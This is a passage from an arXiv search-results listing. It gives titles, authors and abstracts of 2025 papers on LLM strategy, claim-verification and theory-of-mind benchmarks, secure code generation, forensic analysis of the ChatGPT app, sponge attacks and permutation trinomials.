This paper introduces the Generality-Accuracy-Simplicity (GAS) framework to analyze how large language models (LLMs) are reshaping organizations and competitive strategy. We argue that viewing AI as a simple reduction in input costs overlooks two critical dynamics: (a) the inherent trade-offs among generality, accuracy, and simplicity, and (b) the redistribution of complexity across stakeholders. While LLMs appear to defy the traditional trade-off by offering high generality and accuracy through simple interfaces, this user-facing simplicity masks a significant shift of complexity to infrastructure, compliance, and specialized personnel. The GAS trade-off, therefore, does not disappear but is relocated from the user to the organization, creating new managerial challenges, particularly around accuracy in high-stakes applications. We contend that competitive advantage no longer stems from mere AI adoption, but from mastering this redistributed complexity through the design of abstraction layers, workflow alignment, and complementary expertise. This study advances AI strategy by clarifying how scalable cognition relocates complexity and redefines the conditions for technology integration.
△ Less
Submitted 10 June, 2025;
originally announced June 2025.
-
MuSciClaims: Multimodal Scientific Claim Verification
Authors:
Yash Kumar Lal,
Manikanta Bandham,
Mohammad Saqib Hasan,
Apoorva Kashi,
Mahnaz Koupaee,
Niranjan Balasubramanian
Abstract:
Assessing scientific claims requires identifying, extracting, and reasoning with multimodal data expressed in information-rich figures in scientific literature. Despite the large body of work in scientific QA, figure captioning, and other multimodal reasoning tasks over chart-based data, there are no readily usable multimodal benchmarks that directly test claim verification abilities. To remedy th…
▽ More
Assessing scientific claims requires identifying, extracting, and reasoning with multimodal data expressed in information-rich figures in scientific literature. Despite the large body of work in scientific QA, figure captioning, and other multimodal reasoning tasks over chart-based data, there are no readily usable multimodal benchmarks that directly test claim verification abilities. To remedy this gap, we introduce a new benchmark MuSciClaims accompanied by diagnostics tasks. We automatically extract supported claims from scientific articles, which we manually perturb to produce contradicted claims. The perturbations are designed to test for a specific set of claim verification capabilities. We also introduce a suite of diagnostic tasks that help understand model failures. Our results show most vision-language models are poor (~0.3-0.5 F1), with even the best model only achieving 0.72 F1. They are also biased towards judging claims as supported, likely misunderstanding nuanced perturbations within the claims. Our diagnostics show models are bad at localizing correct evidence within figures, struggle with aggregating information across modalities, and often fail to understand basic components of the figure.
△ Less
Submitted 29 July, 2025; v1 submitted 4 June, 2025;
originally announced June 2025.
-
Evaluating Apple Intelligence's Writing Tools for Privacy Against Large Language Model-Based Inference Attacks: Insights from Early Datasets
Authors:
Mohd. Farhan Israk Soumik,
Syed Mhamudul Hasan,
Abdur R. Shahid
Abstract:
The misuse of Large Language Models (LLMs) to infer emotions from text for malicious purposes, known as emotion inference attacks, poses a significant threat to user privacy. In this paper, we investigate the potential of Apple Intelligence's writing tools, integrated across iPhone, iPad, and MacBook, to mitigate these risks through text modifications such as rewriting and tone adjustment. By deve…
▽ More
The misuse of Large Language Models (LLMs) to infer emotions from text for malicious purposes, known as emotion inference attacks, poses a significant threat to user privacy. In this paper, we investigate the potential of Apple Intelligence's writing tools, integrated across iPhone, iPad, and MacBook, to mitigate these risks through text modifications such as rewriting and tone adjustment. By developing early novel datasets specifically for this purpose, we empirically assess how different text modifications influence LLM-based detection. This capability suggests strong potential for Apple Intelligence's writing tools as privacy-preserving mechanisms. Our findings lay the groundwork for future adaptive rewriting systems capable of dynamically neutralizing sensitive emotional content to enhance user privacy. To the best of our knowledge, this research provides the first empirical analysis of Apple Intelligence's text-modification tools within a privacy-preservation context with the broader goal of developing on-device, user-centric privacy-preserving mechanisms to protect against LLMs-based advanced inference attacks on deployed systems.
△ Less
Submitted 4 June, 2025;
originally announced June 2025.
-
Teaching an Old LLM Secure Coding: Localized Preference Optimization on Distilled Preferences
Authors:
Mohammad Saqib Hasan,
Saikat Chakraborty,
Santu Karmaker,
Niranjan Balasubramanian
Abstract:
LLM generated code often contains security issues. We address two key challenges in improving secure code generation. First, obtaining high quality training data covering a broad set of security issues is critical. To address this, we introduce a method for distilling a preference dataset of insecure and secure code pairs from frontier LLMs, along with a security reasoning that explains the issues…
▽ More
LLM generated code often contains security issues. We address two key challenges in improving secure code generation. First, obtaining high quality training data covering a broad set of security issues is critical. To address this, we introduce a method for distilling a preference dataset of insecure and secure code pairs from frontier LLMs, along with a security reasoning that explains the issues and the fix. The key idea here is to make use of security knowledge sources to devise a systematic prompting strategy that ensures broad coverage. Second, aligning models to secure code requires focusing on localized regions of code. Direct preference optimization methods, like SimPO, are not designed to handle these localized differences and turn out to be ineffective. We address this with a new localized preference optimization algorithm that masks the security related tokens in both the winning (secure) and losing (insecure) responses. To prevent loss in code quality, we also add a regularizer. Evaluations show that both training on our dataset, DiSCo, and the new preference optimization algorithm, LPO, yield substantial reductions in code insecurity while also improving overall code quality. Code and dataset are available at https://github.com/StonyBrookNLP/disco-lpo.
△ Less
Submitted 10 September, 2025; v1 submitted 31 May, 2025;
originally announced June 2025.
-
Digital Forensic Investigation of the ChatGPT Windows Application
Authors:
Malithi Wanniarachchi Kankanamge,
Nick McKenna,
Santiago Carmona,
Syed Mhamudul Hasan,
Abdur R. Shahid,
Ahmed Imteaj
Abstract:
The ChatGPT Windows application offers better user interaction in the Windows operating system (OS) by enhancing productivity and streamlining the workflow of ChatGPT's utilization. However, there are potential misuses associated with this application that require rigorous forensic analysis. This study presents a holistic forensic analysis of the ChatGPT Windows application, focusing on identifyin…
▽ More
The ChatGPT Windows application offers better user interaction in the Windows operating system (OS) by enhancing productivity and streamlining the workflow of ChatGPT's utilization. However, there are potential misuses associated with this application that require rigorous forensic analysis. This study presents a holistic forensic analysis of the ChatGPT Windows application, focusing on identifying and recovering digital artifacts for investigative purposes. With the use of widely popular and openly available digital forensics tools such as Autopsy, FTK Imager, Magnet RAM Capture, Wireshark, and Hex Workshop, this research explores different methods to extract and analyze cache, chat logs, metadata, and network traffic from the application. Our key findings also demonstrate the history of the application's chat, user interactions, and system-level traces that can be recovered even after deletion, providing critical insights into the crime investigation and, thus, documenting and outlining a potential misuse report for digital forensics.
△ Less
Submitted 29 May, 2025;
originally announced May 2025.
-
Multi-Party Conversational Agents: A Survey
Authors:
Sagar Sapkota,
Mohammad Saqib Hasan,
Mubarak Shah,
Santu Karmaker
Abstract:
Multi-party Conversational Agents (MPCAs) are systems designed to engage in dialogue with more than two participants simultaneously. Unlike traditional two-party agents, designing MPCAs faces additional challenges due to the need to interpret both utterance semantics and social dynamics. This survey explores recent progress in MPCAs by addressing three key questions: 1) Can agents model each parti…
▽ More
Multi-party Conversational Agents (MPCAs) are systems designed to engage in dialogue with more than two participants simultaneously. Unlike traditional two-party agents, designing MPCAs faces additional challenges due to the need to interpret both utterance semantics and social dynamics. This survey explores recent progress in MPCAs by addressing three key questions: 1) Can agents model each participants' mental states? (State of Mind Modeling); 2) Can they properly understand the dialogue content? (Semantic Understanding); and 3) Can they reason about and predict future conversation flow? (Agent Action Modeling). We review methods ranging from classical machine learning to Large Language Models (LLMs) and multi-modal systems. Our analysis underscores Theory of Mind (ToM) as essential for building intelligent MPCAs and highlights multi-modal understanding as a promising yet underexplored direction. Finally, this survey offers guidance to future researchers on developing more capable MPCAs.
△ Less
Submitted 24 May, 2025;
originally announced May 2025.
-
$\texttt{DIAMONDs}$: A Dataset for $\mathbb{D}$ynamic $\mathbb{I}$nformation $\mathbb{A}$nd $\mathbb{M}$ental modeling $\mathbb{O}$f $\mathbb{N}$umeric $\mathbb{D}$iscussions
Authors:
Sayontan Ghosh,
Mahnaz Koupaee,
Yash Kumar Lal,
Pegah Alipoormolabashi,
Mohammad Saqib Hasan,
Jun Seok Kang,
Niranjan Balasubramanian
Abstract:
Understanding multiparty conversations demands robust Theory of Mind (ToM) capabilities, including the ability to track dynamic information, manage knowledge asymmetries, and distinguish relevant information across extended exchanges. To advance ToM evaluation in such settings, we present a carefully designed scalable methodology for generating high-quality benchmark conversation-question pairs wi…
▽ More
Understanding multiparty conversations demands robust Theory of Mind (ToM) capabilities, including the ability to track dynamic information, manage knowledge asymmetries, and distinguish relevant information across extended exchanges. To advance ToM evaluation in such settings, we present a carefully designed scalable methodology for generating high-quality benchmark conversation-question pairs with these characteristics. Using this methodology, we create $\texttt{DIAMONDs}$, a new conversational QA dataset covering common business, financial or other group interactions. In these goal-oriented conversations, participants often have to track certain numerical quantities (say $\textit{expected profit}$) of interest that can be derived from other variable quantities (like $\textit{marketing expenses, expected sales, salary}$, etc.), whose values also change over the course of the conversation. $\texttt{DIAMONDs}$ questions pose simple numerical reasoning problems over such quantities of interest (e.g., $\textit{funds required for charity events, expected company profit next quarter}$, etc.) in the context of the information exchanged in conversations. This allows for precisely evaluating ToM capabilities for carefully tracking and reasoning over participants' knowledge states.
Our evaluation of state-of-the-art language models reveals significant challenges in handling participant-centric reasoning, specifically in situations where participants have false beliefs. Models also struggle with conversations containing distractors and show limited ability to identify scenarios with insufficient information. These findings highlight current models' ToM limitations in handling real-world multi-party conversations.
△ Less
Submitted 18 May, 2025;
originally announced May 2025.
-
Sponge Attacks on Sensing AI: Energy-Latency Vulnerabilities and Defense via Model Pruning
Authors:
Syed Mhamudul Hasan,
Hussein Zangoti,
Iraklis Anagnostopoulos,
Abdur R. Shahid
Abstract:
Recent studies have shown that sponge attacks can significantly increase the energy consumption and inference latency of deep neural networks (DNNs). However, prior work has focused primarily on computer vision and natural language processing tasks, overlooking the growing use of lightweight AI models in sensing-based applications on resource-constrained devices, such as those in Internet of Thing…
▽ More
Recent studies have shown that sponge attacks can significantly increase the energy consumption and inference latency of deep neural networks (DNNs). However, prior work has focused primarily on computer vision and natural language processing tasks, overlooking the growing use of lightweight AI models in sensing-based applications on resource-constrained devices, such as those in Internet of Things (IoT) environments. These attacks pose serious threats of energy depletion and latency degradation in systems where limited battery capacity and real-time responsiveness are critical for reliable operation. This paper makes two key contributions. First, we present the first systematic exploration of energy-latency sponge attacks targeting sensing-based AI models. Using wearable sensing-based AI as a case study, we demonstrate that sponge attacks can substantially degrade performance by increasing energy consumption, leading to faster battery drain, and by prolonging inference latency. Second, to mitigate such attacks, we investigate model pruning, a widely adopted compression technique for resource-constrained AI, as a potential defense. Our experiments show that pruning-induced sparsity significantly improves model resilience against sponge poisoning. We also quantify the trade-offs between model efficiency and attack resilience, offering insights into the security implications of model compression in sensing-based AI systems deployed in IoT environments.
△ Less
Submitted 9 May, 2025;
originally announced May 2025.
-
A Unifying Bias-aware Multidisciplinary Framework for Investigating Socio-Technical Issues
Authors:
Sacha Hasan,
Mehdi Rizvi,
Yingfang Yuan,
Kefan Chen,
Lynne Baillie,
Wei Pang
Abstract:
This paper aims to bring together the disciplines of social science (SS) and computer science (CS) in the design and implementation of a novel multidisciplinary framework for systematic, transparent, ethically-informed, and bias-aware investigation of socio-technical issues. For this, various analysis approaches from social science and machine learning (ML) were applied in a structured sequence to…
▽ More
This paper aims to bring together the disciplines of social science (SS) and computer science (CS) in the design and implementation of a novel multidisciplinary framework for systematic, transparent, ethically-informed, and bias-aware investigation of socio-technical issues. For this, various analysis approaches from social science and machine learning (ML) were applied in a structured sequence to arrive at an original methodology of identifying and quantifying objects of inquiry. A core feature of this framework is that it highlights where bias occurs and suggests possible steps to mitigate it. This is to improve the robustness, reliability, and explainability of the framework and its results. Such an approach also ensures that the investigation of socio-technical issues is transparent about its own limitations and potential sources of bias. To test our framework, we utilised it in the multidisciplinary investigation of the online harms encountered by minoritised ethnic (ME) communities when accessing and using digitalised social housing services in the UK. We draw our findings from 100 interviews with ME individuals in four cities across the UK to understand ME vulnerabilities when accessing and using digitalised social housing services. In our framework, a sub-sample of interviews focusing on ME individuals residing in social housing units were inductively coded. This resulted in the identification of the topics of discrimination, digital poverty, lack of digital literacy, and lack of English proficiency as key vulnerabilities of ME communities. Further ML techniques such as Topic Modelling and Sentiment Analysis were used within our framework where we found that Black African communities are more likely to experience these vulnerabilities in the access, use and outcome of digitalised social housing services.
△ Less
Submitted 6 May, 2025;
originally announced May 2025.
-
Four new classes of permutation trinomials and their compositional inverses
Authors:
Sartaj Ul Hasan,
Ramandeep Kaur,
Hridesh Kumar
Abstract:
We construct four new classes of permutation trinomials over the cubic extension of a finite field with even characteristic. Additionally, we explicitly provide the compositional inverse of each class of permutation trinomials in polynomial form. Furthermore, we derive the compositional inverse of the permutation trinomial $αX^{q(q^2 - q + 1)} + βX^{q^2 - q + 1} + 2X$ for $α= 1$ and $β= 1$, origin…
▽ More
We construct four new classes of permutation trinomials over the cubic extension of a finite field with even characteristic. Additionally, we explicitly provide the compositional inverse of each class of permutation trinomials in polynomial form. Furthermore, we derive the compositional inverse of the permutation trinomial $αX^{q(q^2 - q + 1)} + βX^{q^2 - q + 1} + 2X$ for $α= 1$ and $β= 1$, originally proposed by Xie, Li, Xu, Zeng, and Tang (2023).
△ Less
Submitted 4 May, 2025;
originally announced May 2025.